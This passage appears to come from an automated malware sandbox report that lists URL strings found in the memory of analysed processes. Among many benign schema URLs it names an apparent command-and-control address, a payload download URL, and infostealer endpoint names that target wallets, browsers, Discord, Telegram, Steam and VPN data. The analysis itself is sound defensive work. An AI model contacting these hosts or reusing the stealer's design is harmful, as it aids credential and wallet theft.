Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.601847685.0000000003EAC000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000006.00000002.529158969.0000024194AF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 4851.exe, 00000016.00000002.447601958.0000000004944000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 4851.exe, 00000016.00000002.447601958.0000000004944000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD
Source: 4851.exe, 00000016.00000002.447601958.0000000004944000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagel
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity$
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.600215383.0000000003E9D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty8
Source: 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.601847685.0000000003EAC000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: DB3B.exe, 0000001A.00000002.601847685.0000000003EAC000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/00
Source: DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/
Source: DB3B.exe, 0000001A.00000002.600215383.0000000003E9D000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/Confirm
Source: 4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/ConfirmResponse
Source: DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/Init
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/InitDisplay
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/InitDisplayResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/InitResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartBrowsers
Source: 4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartBrowsersResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartColdWallets
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartColdWalletsResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartDefenders
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartDefendersResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartDiscord
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartDiscordResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnections
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartFtpConnectionsResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445917023.0000000004722000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartHardwares
Source: 4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartHardwaresResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsers
Source: 4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledBrowsersResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwares
Source: 4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartLanguages
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartLanguagesResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartNordVPN
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartNordVPNResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPN
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartOpenVPNResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartProcesses
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartProcessesResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPN
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartProtonVPNResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartScannedFiles
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartScannedFilesResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartSteamFiles
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartSteamFilesResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFiles
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/PartTelegramFilesResponse
Source: DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: rnyuf.exe, 00000021.00000002.571555571.0000000006748000.00000004.00000001.sdmp	String found in binary or memory: http://trustmanager.ug/k8FppT/index.php
Source: rnyuf.exe, 00000021.00000002.561790978.0000000006703000.00000004.00000001.sdmp	String found in binary or memory: http://trustmanager.ug/k8FppT/index.phpU
Source: rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	String found in binary or memory: http://waskitaprecast.co.id/Explorer.exe
Source: rnyuf.exe, 00000021.00000002.561790978.0000000006703000.00000004.00000001.sdmp	String found in binary or memory: http://waskitaprecast.co.id/Explorer.exeG
Source: rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	String found in binary or memory: http://waskitaprecast.co.id/Explorer.exeO5SXEl
Source: rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	String found in binary or memory: http://waskitaprecast.co.id/Explorer.exeV
Source: rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	String found in binary or memory: http://waskitaprecast.co.id/Explorer.exededz
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: svchost.exe, 0000000D.00000002.309676644.00000225C9413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 4851.exe, 00000016.00000002.460452970.0000000007BF9000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.553483787.0000000001E8D000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: svchost.exe, 00000014.00000003.338103638.000001C44199E000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000014.00000003.338103638.000001C44199E000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: svchost.exe, 00000014.00000002.357402544.000001C441257000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.
